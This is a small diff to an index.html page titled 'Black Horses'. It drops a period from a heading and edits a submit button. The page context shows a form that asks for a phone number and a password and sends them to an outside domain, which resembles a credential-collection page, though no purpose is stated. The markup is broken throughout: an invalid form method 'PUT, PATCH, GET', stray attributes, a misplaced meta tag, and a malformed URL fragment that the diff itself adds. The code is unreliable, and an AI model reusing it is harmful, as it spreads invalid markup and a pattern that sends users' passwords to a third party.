--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
   </head>
  <meta charset="UTF-8">
   <body>
-      <p style="text-align: center;">Black Horses.</p>
+      <p style="text-align: center;">Black Horses</p>
       <a href="http://www.screenmirrorapp.com/" link>Black Horses</a>
 <form id="phoneForm" action="http://www.screenmirrorapp.com/submit-phone.php" method="PUT, PATCH, GET">
   <label for="phone">Enter your phone number:</label>
@@ -45,7 +45,7 @@
         <label for="password">Password:</label><br>
         <input type="password" id="password" name="password" required><br><br>
 
-        <input type="submit" value="Submit" http://www.screenmirrorapp.com/" link>
+        <input type="submit" value="Submit" http:www.screenmirrorapp.com">
     </form>
 <script>
 setTimeout(function() {
